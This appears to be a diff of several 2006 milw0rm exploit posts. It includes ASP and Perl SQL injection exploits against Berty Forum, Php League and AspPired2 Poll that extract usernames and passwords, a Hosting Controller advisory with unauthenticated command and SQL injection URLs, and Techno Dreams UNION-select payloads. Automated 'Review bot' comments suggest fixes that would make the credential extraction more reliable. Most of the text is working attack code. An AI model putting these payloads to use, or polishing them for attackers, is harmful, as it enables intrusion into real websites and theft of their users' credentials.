alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again"); alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
} }
} }
function writetext() { function writetext() {
if(document.form1.field1.value==""){ if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>' document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
} }
} }
function write(){ function write(){
setTimeout("writetext()",1000); setTimeout("writetext()",1000);
} }
</script> </script>
</head> </head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000"> <body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
<center> <center>
<font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">Berty Forum &lt;=</b>v1.4(index.php) <u><b> <font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">Berty Forum &lt;=</b>v1.4(index.php) <u><b>
Blind SQL Injection Exploit</b></u></a></font><br><br> Blind SQL Injection Exploit</b></u></a></font><br><br>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080"> <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr> <tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"> <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p> <font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User <b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
ID=1]</b></font></td> ID=1]</b></font></td>
<td width="50%"><center> <td width="50%"><center>
<form method="post" name="form1" action="exploit1.asp?islem=get"> <form method="post" name="form1" action="exploit1.asp?islem=get">
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080"> <input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080">
<input type="submit" value="Get"></center></td> <input type="submit" value="Get"></center></td>
</tr> </tr>
</table> </table>
<div id=htmlAlani></div> <div id=htmlAlani></div>
<% <%
islem = Request.QueryString("islem") islem = Request.QueryString("islem")
If islem = "hata1" Then If islem = "hata1" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>" Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
End If End If
If islem = "hata2" Then If islem = "hata2" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>" Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
End If End If
If islem = "hata3" Then If islem = "hata3" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>" Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
End If End If
%> %>
<% <%
If islem = "get" Then If islem = "get" Then
string1="/index.php?consult=1&indMemo=" string1="/index.php?consult=1&indMemo="
string2="-1%20union select%20" string2="-1%20union select%20"
string3="mdp%20" string3="mdp%20"
string4="from%20" string4="from%20"
string5="membre%20" string5="membre%20"
string6="where%20" string6="where%20"
string7="ind like%20" string7="ind like%20"
string8=Request.Form("id") string8=Request.Form("id")
string9="/index.php?consult=1&indMemo=" string9="/index.php?consult=1&indMemo="
string10="-1%20union select%20" string10="-1%20union select%20"
string11="nom%20" string11="nom%20"
string12="from%20" string12="from%20"
string13="membre%20" string13="membre%20"
string14="where%20" string14="where%20"
string15="ind like%20" string15="ind like%20"
string16=Request.Form("id") string16=Request.Form("id")
targettext = Request.Form("text1") targettext = Request.Form("text1")
arama=InStr(1, targettext, "union" ,1) arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1) arama2=InStr(1, targettext, "http://" ,1)
If targettext="" Then If targettext="" Then
Response.Redirect("exploit1.asp?islem=hata1") Response.Redirect("exploit1.asp?islem=hata1")
Else Else
If arama>0 then If arama>0 then
Response.Redirect("exploit1.asp?islem=hata2") Response.Redirect("exploit1.asp?islem=hata2")
Else Else
If arama2=0 then If arama2=0 then
Response.Redirect("exploit1.asp?islem=hata3") Response.Redirect("exploit1.asp?islem=hata3")
Else Else
%> %>
<% <%
target1 = targettext+string1+string2+string3+string4+string5+string6+string7+string8 target1 = targettext+string1+string2+string3+string4+string5+string6+string7+string8
target2 = targettext+string9+string10+string11+string12+string13+string14+string15+string16 target2 = targettext+string9+string10+string11+string12+string13+string14+string15+string16
Public Function take(come) Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" ) Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake With objtake
.Open "GET" , come, FALSE .Open "GET" , come, FALSE
.sEnd .sEnd
take = .Responsetext take = .Responsetext
End With End With
SET objtake = Nothing SET objtake = Nothing
End Function End Function
get_username = take(target1) get_username = take(target1)
get_password = take(target2) get_password = take(target2)
getdata=InStr(get_username,"""720"" valign=""top"">" ) getdata=InStr(get_username,"""720"" valign=""top"">" )
username=Mid(get_username,getdata+19,20) username=Mid(get_username,getdata+19,20)
passwd=Mid(get_password,getdata+19,20) passwd=Mid(get_password,getdata+19,20)
%> %>
<center> <center>
<font face="Verdana" size="2" color="#008000"> <u><b> <font face="Verdana" size="2" color="#008000"> <u><b>
ajann<br></b></u></font> ajann<br></b></u></font>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080"> <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr> <tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b><font size="2" face="Arial">User Name:</font></b></td> <b><font size="2" face="Arial">User Name:</font></b></td>
<td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></font></b></td> <td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></font></b></td>
</tr> </tr>
<tr> <tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b><font size="2" face="Arial">&nbsp;User Password:</font></b></td> <b><font size="2" face="Arial">&nbsp;User Password:</font></b></td>
<td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=passwd%></font></b></td> <td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=passwd%></font></b></td>
</tr> </tr>
</table> </table>
<form method="POST" name="form2" action="#"> <form method="POST" name="form2" action="#">
<input type="hidden" name="field1" size="20" value="<%=passwd%>"></p> <input type="hidden" name="field1" size="20" value="<%=passwd%>"></p>
</form> </form>
</center> </center>
<script language="JavaScript"> <script language="JavaScript">
write() write()
functionControl1() functionControl1()
</script> </script>
</body> </body>
</html> </html>
<% <%
End If End If
End If End If
End If End If
End If End If
Set objtake = Nothing Set objtake = Nothing
%> %>
# milw0rm.com [2006-10-24] # milw0rm.com [2006-10-24]
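Review bot: the result labels are swapped relative to the queries built above: `target1` selects `mdp` (string3) and `target2` selects `nom` (string11), yet `take(target1)` is stored in `get_username` and rendered under "User Name" while `take(target2)` ends up under "User Password"; rename the two variables or swap the assignments so the table matches the columns. `passwd=Mid(get_password,getdata+19,20)` also reuses the `getdata` offset that `InStr` measured on `get_username`, so the second slice is taken at a position found in a different response; compute `InStr(get_password, ...)` separately, and treat an `InStr` result of 0 as a failure rather than falling through to `Mid` at offset 19. The trailing `Set objtake = Nothing` after the last `End If` is dead code, since `objtake` is local to `take` and already released there.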


@ -1,179 +1,179 @@
<% Response.Buffer = True %> <% Response.Buffer = True %>
<% On Error Resume Next %> <% On Error Resume Next %>
<% Server.ScriptTimeout = 100 %> <% Server.ScriptTimeout = 100 %>
<% <%
'=============================================================================================== '===============================================================================================
'[Script Name: Php League v0.82 (classement.php) Remote SQL Injection Exploit '[Script Name: Php League v0.82 (classement.php) Remote SQL Injection Exploit
'[Coded by : ajann '[Coded by : ajann
'[Author : ajann '[Author : ajann
'[Contact : :( '[Contact : :(
'[ExploitName: exploit2.asp '[ExploitName: exploit2.asp
'[Note : exploit file name =>exploit2.asp '[Note : exploit file name =>exploit2.asp
'[Note : If Wrong Id = "CTYPE html PUBLIC..... see" '[Note : If Wrong Id = "CTYPE html PUBLIC..... see"
'[Using : Write Target and ID after Submit Click '[Using : Write Target and ID after Submit Click
'=============================================================================================== '===============================================================================================
%> %>
<html> <html>
<title>Php League v0.82 (classement.php) Remote SQL Injection Exploit</title> <title>Php League v0.82 (classement.php) Remote SQL Injection Exploit</title>
<head> <head>
<script language="JavaScript"> <script language="JavaScript">
function functionControl1(){ function functionControl1(){
setTimeout("functionControl2()",2000); setTimeout("functionControl2()",2000);
} }
function functionControl2(){ function functionControl2(){
if(document.form1.field1.value==""){ if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again"); alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
} }
} }
function writetext() { function writetext() {
if(document.form1.field1.value==""){ if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>' document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
} }
} }
function write(){ function write(){
setTimeout("writetext()",1000); setTimeout("writetext()",1000);
} }
</script> </script>
</head> </head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000"> <body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
<center> <center>
<font face="Verdana" size="2" color="#008000"><b><a href="exploit2.asp">Php League</b>v0.82 (classement.php) <u><b> <font face="Verdana" size="2" color="#008000"><b><a href="exploit2.asp">Php League</b>v0.82 (classement.php) <u><b>
Remote SQL Injection Exploit</b></u></a></font><br><br> Remote SQL Injection Exploit</b></u></a></font><br><br>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080"> <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr> <tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"> <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p> <font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User <b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
ID=1]</b></font></td> ID=1]</b></font></td>
<td width="50%"><center> <td width="50%"><center>
<form method="post" name="form1" action="exploit2.asp?islem=get"> <form method="post" name="form1" action="exploit2.asp?islem=get">
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="10" size="25" style="background-color: #808080"> <input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="10" size="25" style="background-color: #808080">
<input type="submit" value="Get"></center></td> <input type="submit" value="Get"></center></td>
</tr> </tr>
</table> </table>
<div id=htmlAlani></div> <div id=htmlAlani></div>
<% <%
islem = Request.QueryString("islem") islem = Request.QueryString("islem")
If islem = "hata1" Then If islem = "hata1" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>" Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
End If End If
If islem = "hata2" Then If islem = "hata2" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>" Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
End If End If
If islem = "hata3" Then If islem = "hata3" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>" Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
End If End If
%> %>
<% <%
If islem = "get" Then If islem = "get" Then
string2="/consult/classement.php?champ='" string2="/consult/classement.php?champ='"
string3="%20union%20select%200,0,concat(char(85),char(115)," string3="%20union%20select%200,0,concat(char(85),char(115),"
string4="char(101),char(114),char(73),char(68),char(58)," string4="char(101),char(114),char(73),char(68),char(58),"
string5="id,char(32),char(65),char(100),char(109)" string5="id,char(32),char(65),char(100),char(109)"
string6=",char(105),char(110),char(63),char(58),admin,char(32),char(85)," string6=",char(105),char(110),char(63),char(58),admin,char(32),char(85),"
string7="char(115),char(101),char(114),char(78),char(97),char(109)," string7="char(115),char(101),char(114),char(78),char(97),char(109),"
string8="char(101),char(58),pseudo,char(32),char(80),char(97),char(115)," string8="char(101),char(58),pseudo,char(32),char(80),char(97),char(115),"
string9="char(115),char(58),char(13),char(10),mot_de_passe)" string9="char(115),char(58),char(13),char(10),mot_de_passe)"
string10="%20from%20phpl_membres%20where" string10="%20from%20phpl_membres%20where"
string11="%20id%20like%20" string11="%20id%20like%20"
string12=Request.Form("id") string12=Request.Form("id")
string13="/*" string13="/*"
targettext = Request.Form("text1") targettext = Request.Form("text1")
arama=InStr(1, targettext, "union" ,1) arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1) arama2=InStr(1, targettext, "http://" ,1)
If targettext="" Then If targettext="" Then
Response.Redirect("exploit2.asp?islem=hata1") Response.Redirect("exploit2.asp?islem=hata1")
Else Else
If arama>0 then If arama>0 then
Response.Redirect("exploit2.asp?islem=hata2") Response.Redirect("exploit2.asp?islem=hata2")
Else Else
If arama2=0 then If arama2=0 then
Response.Redirect("exploit2.asp?islem=hata3") Response.Redirect("exploit2.asp?islem=hata3")
Else Else
%> %>
<% <%
target1 = targettext+string2+string3+string4+string5+string6+string7+string8+string9+string10+string11+string12+string13 target1 = targettext+string2+string3+string4+string5+string6+string7+string8+string9+string10+string11+string12+string13
Public Function take(come) Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" ) Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake With objtake
.Open "GET" , come, FALSE .Open "GET" , come, FALSE
.sEnd .sEnd
take = .Responsetext take = .Responsetext
End With End With
SET objtake = Nothing SET objtake = Nothing
End Function End Function
get_username = take(target1) get_username = take(target1)
getdata=InStr(get_username,"0 0/" ) getdata=InStr(get_username,"0 0/" )
username=Mid(get_username,getdata+5,90) username=Mid(get_username,getdata+5,90)
%> %>
<center> <center>
<font face="Verdana" size="2" color="#008000"> <u><b> <font face="Verdana" size="2" color="#008000"> <u><b>
ajann<br></b></u></font> ajann<br></b></u></font>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080"> <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr> <tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b><font size="2" face="Arial">Data:</font></b></td> <b><font size="2" face="Arial">Data:</font></b></td>
<td width="80%"> <td width="80%">
&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></b></font></p> &nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></b></font></p>
</td> </td>
</tr> </tr>
</table> </table>
<form method="POST" name="form2" action="#"> <form method="POST" name="form2" action="#">
<input type="hidden" name="field1" size="20" value="<%=username%>"></p> <input type="hidden" name="field1" size="20" value="<%=username%>"></p>
</form> </form>
</center> </center>
<script language="JavaScript"> <script language="JavaScript">
write() write()
functionControl1() functionControl1()
</script> </script>
</body> </body>
</html> </html>
<% <%
End If End If
End If End If
End If End If
End If End If
Set objtake = Nothing Set objtake = Nothing
%> %>
# milw0rm.com [2006-10-27] # milw0rm.com [2006-10-27]
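Review bot: `getdata=InStr(get_username,"0 0/" )` is never checked for 0, so when the marker is absent `username=Mid(get_username,getdata+5,90)` returns 90 characters from position 5 of whatever page came back (the "CTYPE html PUBLIC..." case the header note warns about), and `functionControl2()` never alerts because `field1` is not empty; redirect to a `hata` state when `getdata = 0`, as the three input checks already do. With `On Error Resume Next` at the top of the file, a failed `Server.CreateObject` or `.Open` likewise surfaces only as an empty `username`, so `Err.Number` should at least be tested after the `.sEnd` call. The `Set objtake = Nothing` after the final `End If` is dead for the same reason as in exploit1.asp: the object is local to `take` and released inside it.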


@ -1,46 +1,46 @@
Hosting Controller 6.1 Hotfix <= 3.2 Multi Vuln. Hosting Controller 6.1 Hotfix <= 3.2 Multi Vuln.
SQL_Injection, Command Injection SQL_Injection, Command Injection
------- -------
[KAPDA::59] - Hosting Controller 6.1 Hotfix <= 3.2 [KAPDA::59] - Hosting Controller 6.1 Hotfix <= 3.2
Vendor: Hosting Controller Vendor: Hosting Controller
Vendor URL: www.hostingcontroller.com Vendor URL: www.hostingcontroller.com
Solution: Hotfix 3.3 Solution: Hotfix 3.3
Found Date: 7/1/2006 Found Date: 7/1/2006
Release Date: 10/10/2006 Release Date: 10/10/2006
Discussion: Discussion:
-------------------- --------------------
UnAuthenticated user can UnAuthenticated user can
1- delete every sites virtual directory on hc sites 1- delete every sites virtual directory on hc sites
2- make forum virtual directory (with the desire name) for everysites on hc! 2- make forum virtual directory (with the desire name) for everysites on hc!
3- disable all hc forums by SQL Injection 3- disable all hc forums by SQL Injection
4- enable all hc forums by SQL Injection 4- enable all hc forums by SQL Injection
Bugs are available in "DisableForum.asp" and "enableForum.asp" in forum directory. Bugs are available in "DisableForum.asp" and "enableForum.asp" in forum directory.
Exploit: (or POC) Exploit: (or POC)
-------------------- --------------------
1- unAuthenticated user can delete every sites virtual directory on hc sites by forum! 1- unAuthenticated user can delete every sites virtual directory on hc sites by forum!
/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testsite.com&VDirName=test&ForumID=1 /forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testsite.com&VDirName=test&ForumID=1
----------------------------------------------------------------- -----------------------------------------------------------------
2- unAuthenticated user can make forum virtual directory (with the desire name) for everysites on hc by forum! 2- unAuthenticated user can make forum virtual directory (with the desire name) for everysites on hc by forum!
/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testsite.com&VDirName=test&ForumID= /forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testsite.com&VDirName=test&ForumID=
----------------------------------------------------------------- -----------------------------------------------------------------
3- unAuthenticated user can disable all hc forums by SQL_Injection 3- unAuthenticated user can disable all hc forums by SQL_Injection
/forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1 /forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1
----------------------------------------------------------------- -----------------------------------------------------------------
4- unAuthenticated user can enable all hc forums by SQL_Injection 4- unAuthenticated user can enable all hc forums by SQL_Injection
/forum/HCSpecific/EnableForum.asp?action=enableforum&ForumID=1 or 1=1 /forum/HCSpecific/EnableForum.asp?action=enableforum&ForumID=1 or 1=1
-------------------- --------------------
Credit : Credit :
-------------------- --------------------
Soroush Dalili of Kapda and GSG Soroush Dalili of Kapda and GSG
IRSDL [4t} kapda <d0t] ir IRSDL [4t} kapda <d0t] ir
Kapda - Security Science Researchers Insitute [http://www.KAPDA.ir] Kapda - Security Science Researchers Insitute [http://www.KAPDA.ir]
GSG - Grayhatz security group [http://www.Grayhatz.net] GSG - Grayhatz security group [http://www.Grayhatz.net]
# milw0rm.com [2006-10-27] # milw0rm.com [2006-10-27]
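Review bot: the Discussion section never states the root causes, which matters for the single "Solution: Hotfix 3.3" line: items 1 and 2 are a missing authentication/authorization check on `DisableForum.asp` and `EnableForum.asp` (the `WSiteName`/`VDirName` parameters are honoured for any unauthenticated caller), while items 3 and 4 are unparameterised use of `ForumID` in SQL; a fix that only addresses one of the two leaves the other open, so the advisory should say the hotfix covers both. Minor: "Insitute" in the Kapda credit line should be "Institute", and "everysites" should be "every site's".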


@ -1,21 +1,21 @@
******************************************************************************* *******************************************************************************
# Title : Techno Dreams Announcement (MainAnnounce2.asp) Remote SQL Injection Vulnerability # Title : Techno Dreams Announcement (MainAnnounce2.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Script Page: http://www.t-dreams.com # Script Page: http://www.t-dreams.com
******************************************************************************* *******************************************************************************
###http://[target]/[path]/MainAnnounce2.asp?key=[ SQL ] ###http://[target]/[path]/MainAnnounce2.asp?key=[ SQL ]
Example: Example:
//MainAnnounce2.asp?key=204%20union%20select%200,UserName,0,Password,0%20from%20admin //MainAnnounce2.asp?key=204%20union%20select%200,UserName,0,Password,0%20from%20admin
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-10-30] # milw0rm.com [2006-10-30]
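Review bot: the header block records no affected version, discovery or release date, or vendor notification status, which the Hosting Controller advisory in the same commit does provide; add them so the fix status is traceable. The example also shows `key` being used unvalidated in a numeric context (`key=204 union select ...` with no quote), so the advisory should name the remediation: cast `key` to an integer or move the lookup to a parameterised query.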


@ -1,21 +1,21 @@
******************************************************************************* *******************************************************************************
# Title : Techno Dreams Guestbook v1.0 (guestbookview.asp) Remote SQL Injection Vulnerability # Title : Techno Dreams Guestbook v1.0 (guestbookview.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Script Page: http://www.t-dreams.com # Script Page: http://www.t-dreams.com
******************************************************************************* *******************************************************************************
###http://[target]/[path]/guestbookview.asp?key=[ SQL ] ###http://[target]/[path]/guestbookview.asp?key=[ SQL ]
Example: Example:
//guestbookview.asp?key=7782%20union%20select%200,0,adminname,password,0,0,0%20from%20admin //guestbookview.asp?key=7782%20union%20select%200,0,adminname,password,0,0,0%20from%20admin
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-10-30] # milw0rm.com [2006-10-30]
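Review bot: same gaps as the MainAnnounce2.asp entry: no dates, no vendor status, and no statement of the fix. The `key` parameter of guestbookview.asp is again injected into a numeric context (`key=7782 union select ...`), so integer validation or a parameterised query is the remediation to record.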


@ -1,87 +1,87 @@
#!/usr/bin/perl #!/usr/bin/perl
#[Script Name: AspPired2 Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit #[Script Name: AspPired2 Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit
#[Coded by : ajann #[Coded by : ajann
#[Author : ajann #[Author : ajann
#[Contact : :( #[Contact : :(
use IO::Socket; use IO::Socket;
if(@ARGV < 3){ if(@ARGV < 3){
print " print "
[======================================================================== [========================================================================
[// AspPired2 Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit [// AspPired2 Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit
[// Usage: class.pl [target] [path] [userid] [// Usage: class.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1 [// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1 [// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann [// Vuln&Exp : ajann
[======================================================================== [========================================================================
"; ";
exit(); exit();
} }
#Local variables #Local variables
$server = $ARGV[0]; $server = $ARGV[0];
$server =~ s/(http:\/\/)//eg; $server =~ s/(http:\/\/)//eg;
$host = "http://".$server; $host = "http://".$server;
$port = "80"; $port = "80";
$dir = $ARGV[1]; $dir = $ARGV[1];
$file = "MoreInfo.asp?id="; $file = "MoreInfo.asp?id=";
$target = "-1+union+select+login+from+user+where+no+like%20".$ARGV[2]; $target = "-1+union+select+login+from+user+where+no+like%20".$ARGV[2];
$target = $host.$dir.$file.$target; $target = $host.$dir.$file.$target;
$targettwo = "-1+union+select+password+from+user+where+no+like%20".$ARGV[2]; $targettwo = "-1+union+select+password+from+user+where+no+like%20".$ARGV[2];
$targettwo = $host.$dir.$file.$targettwo; $targettwo = $host.$dir.$file.$targettwo;
#Writing data to socket #Writing data to socket
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n"; print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n"; print $socket "GET $target\n";
print $socket "Host: $server\n"; print $socket "Host: $server\n";
print $socket "Accept: */*\n"; print $socket "Accept: */*\n";
print $socket "Connection: close\n\n"; print $socket "Connection: close\n\n";
print "+ Connected!...\n"; print "+ Connected!...\n";
#Getting #Getting
while($answer = <$socket>) { while($answer = <$socket>) {
if ($answer =~ /ltext\">(.*?)<\/td>/){ if ($answer =~ /ltext\">(.*?)<\/td>/){
print "+ Exploit succeed! Getting admin information.\n"; print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n"; print "+ ---------------- +\n";
print "+ Username: $1\n"; print "+ Username: $1\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
print "+ Trying to connect for Password: $server\n"; print "+ Trying to connect for Password: $server\n";
$socket1 = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; $socket1 = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket1 "GET $targettwo\n"; print $socket1 "GET $targettwo\n";
print $socket1 "Host: $server\n"; print $socket1 "Host: $server\n";
print $socket1 "Accept: */*\n"; print $socket1 "Accept: */*\n";
print $socket1 "Connection: close\n\n"; print $socket1 "Connection: close\n\n";
print "+ Connected!...\n"; print "+ Connected!...\n";
#Getting #Getting
while($answer = <$socket1>) { while($answer = <$socket1>) {
if ($answer =~ /ltext\">(.*?)<\/td>/){ if ($answer =~ /ltext\">(.*?)<\/td>/){
print "+ Exploit succeed! Getting admin information.\n"; print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n"; print "+ ---------------- +\n";
print "+ Password: $1\n"; print "+ Password: $1\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
if ($answer =~ /Ad removed or not yet approved/) { if ($answer =~ /Ad removed or not yet approved/) {
print "+ Exploit Failed : ( \n"; print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
if ($answer =~ /Internal Server Error/) { if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n"; print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
} }
} }
} }
print "+ Exploit failed :(\n"; print "+ Exploit failed :(\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
# milw0rm.com [2006-11-09] # milw0rm.com [2006-11-09]
